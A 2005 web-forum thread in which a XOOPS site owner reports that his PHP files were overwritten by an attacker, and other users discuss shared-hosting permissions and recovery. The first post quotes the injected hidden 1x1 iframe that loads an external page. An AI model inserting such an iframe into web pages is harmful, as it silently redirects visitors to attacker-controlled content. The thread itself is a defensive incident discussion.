1
blueangel
Bad suprise on monday morning! Site hacked
  • 2005/5/16 6:47

  • blueangel

  • Module Developer

  • Posts: 132

  • Since: 2002/2/20


I had a very very bad surprise while was accessing my site: blank page!

It was not the first time and I was thinking "is a problem with the server database that is down, in some minutes it will come back". But at the bottom of my Firefox browser I saw some strange "redirections" to the site http://www.tendomain.com and I had a bad feeling that something was broken.

I started the FTP and I found ALL PHP files on the server 106 bytes long with the following content:

<iframe src="http://www.tendomain.com/or2.html" frameborder="0" border="0" height="1" width="1">iframe>


how could be happened ?

I am not a beginner of XOOPS, I have been the italian XOOPS support site webmaster for many years and I know all the basic security rules that a XOOPS' site must have! The site was running the latest version of XOOPS, and recently I did not install any new modules.

Maybe there is a vulnerability in XOOPS that has not been yet found, I am really lost now. I am luckiy that the database is safe!

what can I do in order to understand what has happened?

2
Mithrandir
Re: Bad suprise on monday morning! Site hacked

You should contact your host. Overwriting files outside the cache, templates_c and uploads directories is not possible through XOOPS if the folder permissions are set correctly.

3
blueangel
Re: Bad suprise on monday morning! Site hacked
  • 2005/5/16 10:53

  • blueangel

  • Module Developer

  • Posts: 132

  • Since: 2002/2/20


it means that if all the folders permissions are set to CHMOD 755 and all files permissions are set to CHMOD 644, except the mentioned folder, is a problem of my hosting?

is possible than one module, not official, has some "holes" that can be used by an hacker to cause the problem that I have on my website?

4
Mithrandir
Re: Bad suprise on monday morning! Site hacked

If the permissions are set through FTP to not be writeable by the webserver (usually running as another user than the FTP account) there is no way the webserver can change those permissions and change the file contents.

So contact the host (without passing blame ) and hear if they have had similar problems with other sites and if they have already found the cause.

Then roll back to a backed up version of the website files.

5
blueangel
Re: Bad suprise on monday morning! Site hacked
  • 2005/5/16 12:09

  • blueangel

  • Module Developer

  • Posts: 132

  • Since: 2002/2/20


ok, I will contact the hosting, thanks for your support

6
blueangel
Re: Bad suprise on monday morning! Site hacked
  • 2005/5/16 15:14

  • blueangel

  • Module Developer

  • Posts: 132

  • Since: 2002/2/20


the administrator of the server answered me that they have been attacked exploiting a vulnerability of a PHPNuke site that hosted on the same server!!

luckily they did a complete backup on saturday and they have confirmed that the site will be available again in a couple of hours

7
Mithrandir
Re: Bad suprise on monday morning! Site hacked

I'm not a security expert, but think I know enough not to open big holes through my code - but I wouldn't think that a PHP script vulnerability could do what you describe.

Even if a script is uploaded through FTP to a webserver and run would I think that it would be possible to modify files not owned by the user account used by the webserver. Unless the files were writeable by everyone (which XOOPS files should not be - except in cache, templates_c and uploads directories)

I don't know all the details, but my guess is that your host is playing a bit of "pin the tail on the donkey" to cover up insufficient security settings (enabling safe mode, disallowing system commands execution through webserver scripts and similar) or lack of patching the webserver/OS.

I may be wrong of course, but until further information, this is what I will think.

8
blueangel
Re: Bad suprise on monday morning! Site hacked
  • 2005/5/16 16:08

  • blueangel

  • Module Developer

  • Posts: 132

  • Since: 2002/2/20


Quote:
I don't know all the details, but my guess is that your host is playing a bit of "pin the tail on the donkey" to cover up insufficient security settings (enabling safe mode, disallowing system commands execution through webserver scripts and similar) or lack of patching the webserver/OS.


I agree with you, I believe that one hacker is able to exploit a vulnerability of a PHP Nuke site in order to upload malicious script on the server, but I also believe that with a good configuration it is possible to prevent that this script affects other accounts, even if my site is on a "shared hosting"

I only hope that they will take the necessary shrewdness so that this problem will not happen again

9
blueangel
Re: Bad suprise on monday morning! Site hacked
  • 2005/5/17 9:51

  • blueangel

  • Module Developer

  • Posts: 132

  • Since: 2002/2/20


I am happy to announce to all italian users that the official italian support site is online again. All the data has been succesfully restored, ciao

10
banned
Re: Bad suprise on monday morning! Site hacked
  • 2005/5/17 12:42

  • banned

  • Not too shy to talk

  • Posts: 159

  • Since: 2004/5/16


Blueangel,
The problem was on the server (I've a couple of sites on the same server.. a XOOPS one and a mambo one, I've got the problem on every site), not with Xoops.

the _strange_ thing that I've noticed on my xoops' website is that all files with .php .html .htm .shtml were overwritten with that iframe .. except the files in XOOPS_ROOT/modules/system/
(I've looked, also, on xoopsit.. same thing for you)

banned,

Login

Who's Online

370 user(s) are online (291 user(s) are browsing Support Forums)


Members: 0


Guests: 370


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Nov 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits